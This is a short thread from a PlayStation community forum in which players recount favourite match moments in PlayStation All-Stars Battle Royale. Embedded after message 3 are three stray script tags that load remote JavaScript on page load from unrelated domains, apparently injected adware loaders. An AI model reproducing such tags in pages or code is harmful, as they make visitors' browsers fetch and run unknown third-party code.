Nov 22 2012
By: TweetyPurd Sackboy 478 posts

Epic Moments Tread

6 replies 102 views Edited Nov 22, 2012

You know the drill, post your epic moments, online or offline, kills or combos, anything Smiley Happy

my entree: playing 5 live stock, was beating my brother 4 - 3 when i had to pee (the things excitement does to you Smiley Wink )
i was Cole and he was sir daniel. While i was gone he proceded to unpause the game and kill me 3 times (lovely)
However, i managed to get a level 2 and kill him, then two level 1s to win the match Smiley Very Happy

Message 1 of 7 (102 Views)
0 Likes
Hekseville Citizen
288 posts

Re: Epic Moments Tread

Nov 22, 2012

I took out Raiden's lvl2 with Jak's lvl 1. I wish they had a recording system built in because it was too epic.

Image Hosted At MyspaceGens
Message 2 of 7 (88 Views)
0 Likes
Gaming Beast
2167 posts

Nov 22, 2012
A couple highlights from today, all online 2v2 unranked stock matches:

- Playing as Big Daddy: We're both still alive (Forget who my partner was) but the enemy Sackboy is at 2.9 bars. He manages to get the last little bit and with his BS lvl 3 takes us both out 3 times. I respawn close to him with 1 sec left on the level 3. Instead of floating upwards, I float downwards so he jumps over me, level 3 ends, and I proceed to beat the stuffing out of him.

-As FP, I have 2 lives left, my teammate is dead and I have a Sweet Tooth and a Radec against me on the last part of the Uncharted Stage. They have a total of 5 lives. It took ten grueling minutes and a LOT of dodging, but I turn it around and win without losing a stock.

-Playing as Big Daddy again with a Raiden for a partner on the Jak&Dax stage: We destroy one of the two enemies (I forget who he was, but he was bad.) We have a total of 4 lives since the enemy Ratchet has already taken 2. What followed was an impressive display of skill and a very humbling experience for yours truly. This Ratchett beat our **bleep** mercilessly. We didn't get a single kill off of him.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 3 of 7 (78 Views)
0 Likes
Hekseville Citizen
335 posts

[ Edited ]
Nov 22, 2012

Setting: Ranked match, double overtime. I'm playing as Ratchet vs  Big Daddy, Raiden, and Radec. This is a decent skilled match as we are all high teir green belts. Things are looking desperate since Big Daddy was up 2 kills on the rest of us in the round. The seconds begin counting down...

3... Use my pistol to get enough AP for a level 1 super

2... Radec uses a level 1 and gets interrupted by big daddy

1... I'm just outside of the big dady's range, and cue my level 1 super

0... As the clock is hitting 0, literally miliseconds left in the game and everything is slowing down, my level 1 registers and I get a double kill. The match ends just as big daddy and radec turn into little squares, triangles, and circles in slow motion.

I then began to scream so excitedly that my dog began doing backflips and my neighbors baked me a quiche. Most epic moment I've had playing this game and it's only my second day having it. Can't wait for more! 

Message 4 of 7 (74 Views)
First Son
26 posts

[ Edited ]
Nov 22, 2012

I then began to scream so excitedly that my dog began doing backflips and my neighbors baked me a quiche.

that right there is epic

p.s. How sweet-tooth talks to kratos in kratos' arcade mode is epic. L('d)MAO

Get your Portable ID!

-Psasbr's best kept secret-
Message 5 of 7 (66 Views)
0 Likes
Lombax Warrior
131 posts

Nov 22, 2012
I was in a stock match online playing as raiden when we all had one life left kratos and Dante were opposite of the stage from me and Nariko (I think) I wanted to get at least one kill so I used my level one when the other two had happened to just land right over me and got defeated along with Nariko. So yep, triple kill.
Message 6 of 7 (61 Views)
0 Likes
Highlighted
Wastelander
726 posts

Nov 22, 2012
Was in a 2v2 match on Loco Roco, me as sackboy and my partner as kratos vs. a nathan drake and a Radec. All the Drake did was roll barrels and all the Radec did was use his sniper. They both got some good lvl 1's supers on us, puting them 4 or 5 kills ahead.

30 seconds left on the clock, i'm at lvl 2 super desperatly trying to build to a lvl 3 when my parter uses Kratos lvl 3 super. BAM 4 kills! AND it stoped the clock as well, so while it was stopped I built up to my lvl 3 so as soon as his was over SACKBOY'S SUPERRR~! Got 5 kills, and shut 'em down. Must've been the most satifying game i've played yet

1/6/2013 - Defeated the #1 player in the World in a Ranked Match.

Currently maining: Parappa

Future mains: Zeus, Issac
Message 7 of 7 (51 Views)
0 Likes